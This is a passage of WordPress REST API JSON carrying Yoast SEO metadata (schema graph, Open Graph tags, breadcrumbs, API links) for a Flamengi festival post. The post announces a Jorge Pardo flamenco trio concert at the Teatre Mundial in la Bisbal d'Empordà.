\\\/es\\\/author\\\/neoserveis\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"FLAMENGI FESTIVAL","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/flamengi.cat\/es\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/","og_locale":"es_ES","og_type":"article","og_title":"JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d Divendres 20 de novembre a les 21h al Teatre Mundial de la Bisbal d\u2019Empord\u00e0","og_url":"https:\/\/flamengi.cat\/es\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/","og_site_name":"FLAMENGI FESTIVAL","article_publisher":"https:\/\/www.facebook.com\/flamengi.festival","article_published_time":"2026-08-25T09:13:08+00:00","article_modified_time":"2026-09-01T12:06:06+00:00","og_image":[{"width":1200,"height":800,"url":"http:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/Jorge-Pardo-81.jpg.jpeg","type":"image\/jpeg"}],"author":"Neoserveis","twitter_card":"summary_large_image","twitter_creator":"@flamengif","twitter_site":"@flamengif","twitter_misc":{"Escrito por":"Neoserveis","Tiempo de lectura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/flamengi.cat\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/#article","isPartOf":{"@id":"https:\/\/flamengi.cat\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/"},"author":{"name":"Neoserveis","@id":"https:\/\/flamengi.cat\/#\/schema\/person\/99252030689047d68b309be665c89c41"},"headline":"JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d Divendres 20 de novembre a les 21h al Teatre Mundial de la Bisbal d\u2019Empord\u00e0","datePublished":"2026-08-25T09:13:08+00:00","dateModified":"2026-09-01T12:06:06+00:00","mainEntityOfPage":{"@id":"https:\/\/flamengi.cat\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/"},"wordCount":1750,"image":{"@id":"https:\/\/flamengi.cat\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/#primaryimage"},"thumbnailUrl":"https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/Jorge-Pardo-81.jpg.jpeg","articleSection":["Edici\u00f3 2026"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/flamengi.cat\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/","url":"https:\/\/flamengi.cat\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/","name":"JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d Divendres 20 de novembre a les 21h al Teatre Mundial de la Bisbal d\u2019Empord\u00e0 - FLAMENGI FESTIVAL","isPartOf":{"@id":"https:\/\/flamengi.cat\/#website"},"primaryImageOfPage":{"@id":"https:\/\/flamengi.cat\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/#primaryimage"},"image":{"@id":"https:\/\/flamengi.cat\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/#primaryimage"},"thumbnailUrl":"https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/Jorge-Pardo-81.jpg.jpeg","datePublished":"2026-08-25T09:13:08+00:00","dateModified":"2026-09-01T12:06:06+00:00","author":{"@id":"https:\/\/flamengi.cat\/#\/schema\/person\/99252030689047d68b309be665c89c41"},"breadcrumb":{"@id":"https:\/\/flamengi.cat\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/flamengi.cat\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/flamengi.cat\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/#primaryimage","url":"https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/Jorge-Pardo-81.jpg.jpeg","contentUrl":"https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/Jorge-Pardo-81.jpg.jpeg","width":1200,"height":800},{"@type":"BreadcrumbList","@id":"https:\/\/flamengi.cat\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inici","item":"https:\/\/flamengi.cat\/"},{"@type":"ListItem","position":2,"name":"JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d Divendres 20 de novembre a les 21h al Teatre Mundial de la Bisbal d\u2019Empord\u00e0"}]},{"@type":"WebSite","@id":"https:\/\/flamengi.cat\/#website","url":"https:\/\/flamengi.cat\/","name":"FLAMENGI FESTIVAL","description":"Festival Flamenc de Girona","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/flamengi.cat\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/flamengi.cat\/#\/schema\/person\/99252030689047d68b309be665c89c41","name":"Neoserveis","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g","caption":"Neoserveis"},"url":"https:\/\/flamengi.cat\/es\/author\/neoserveis\/"}]}},"_links":{"self":[{"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/posts\/2872","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/comments?post=2872"}],"version-history":[{"count":3,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/posts\/2872\/revisions"}],"predecessor-version":[{"id":2959,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/posts\/2872\/revisions\/2959"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/media\/2874"}],"wp:attachment":[{"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/media?parent=2872"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/categories?post=2872"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/tags?post=2872"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}